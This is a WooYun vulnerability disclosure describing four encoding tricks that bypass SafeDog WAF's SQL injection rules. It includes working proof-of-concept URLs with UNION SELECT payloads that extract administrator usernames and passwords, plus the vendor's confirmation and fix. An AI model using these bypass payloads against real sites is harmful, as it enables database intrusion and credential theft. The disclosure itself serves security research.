当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0169906

漏洞标题:网站安全狗最新版(V3.5.12047)SQL注入防护规则可被四种姿势完美绕过

相关厂商:安全狗

漏洞作者: HackBraid

提交时间:2016-01-14 16:36

修复时间:2016-04-11 16:08

公开时间:2016-04-11 16:08

漏洞类型:非授权访问/认证绕过

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-14: 细节已通知厂商并且等待厂商处理中
2016-01-15: 厂商已经确认,细节仅向厂商公开
2016-01-18: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2016-03-10: 细节向核心白帽子及相关领域专家公开
2016-03-20: 细节向普通白帽子公开
2016-03-30: 细节向实习白帽子公开
2016-04-11: 细节向公众公开

简要描述:

http://www.wooyun.org/bugs/wooyun-2016-0169777的高危变种,四种姿势可变化出无限种绕过方法~
Fuzz大法好!

详细说明:

00# 测试版本
开启URL地址全检测,网站安全狗版本也是最新的

anquangou.png


01# 四种姿势

-%-%2b
-%-%00
-%-%20
-%-%7c


以姿势-%-%2b为例,发现Fuzzing到16W+的payload时终于可以绕过,后续给出获取任意数据的漏洞证明

zishi1.png

漏洞证明:

姿势一:-%-%2b
获取管理员密码的POC:

**.**.**.**/select.php?inject_string=-%-%2b%27+union+select%20GROUP_CONCAT(DISTINCT%20username,0x5f,password)%20from%20admin%23+&sanitize_quotes=none&blacklist_level=none&blacklist_keywords=&query_results=all_rows&error_level=verbose&location=where_string&submit=%D7%A2%C9%E4%21


mima.png


姿势二:-%-%00
获取管理员密码的POC:

**.**.**.**/select.php?inject_string=-%-%00%27+union+select%20GROUP_CONCAT(DISTINCT%20username,0x5f,password)%20from%20admin%23+&sanitize_quotes=none&blacklist_level=none&blacklist_keywords=&query_results=all_rows&error_level=verbose&location=where_string&submit=%D7%A2%C9%E4%21


zishi2.png


姿势三:-%-%20
获取管理员密码的POC:

**.**.**.**/select.php?inject_string=-%-%20%27+union+select%20GROUP_CONCAT(DISTINCT%20username,0x5f,password)%20from%20admin%23+&sanitize_quotes=none&blacklist_level=none&blacklist_keywords=&query_results=all_rows&error_level=verbose&location=where_string&submit=%D7%A2%C9%E4%21


zishi3.png


姿势四:-%-%7c
获取管理员密码的POC:

**.**.**.**/select.php?inject_string=-%-%7c%27+union+select%20GROUP_CONCAT(DISTINCT%20username,0x5f,password)%20from%20admin%23+&sanitize_quotes=none&blacklist_level=none&blacklist_keywords=&query_results=all_rows&error_level=verbose&location=where_string&submit=%D7%A2%C9%E4%21


zishi4.png


只要有上述字符即可,前后随意加字母,以W**.**.**.**为例

9.136/select.php?inject_string=WooY**.**.**.**-%-%7CWooY**.**.**.**%27+union+select%20GROUP_CONCAT(DISTINCT%20username,0x5f,password)%20from%20admin%23+&sanitize_quotes=none&blacklist_level=none&blacklist_keywords=&query_results=all_rows&error_level=verbose&location=where_string&submit=%D7%A2%C9%E4%21


perfect.png


修复方案:

限制变种~

版权声明:转载请注明来源 HackBraid@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2016-01-15 09:09

厂商回复:

非常感谢,修复已完成。

最新状态:

暂无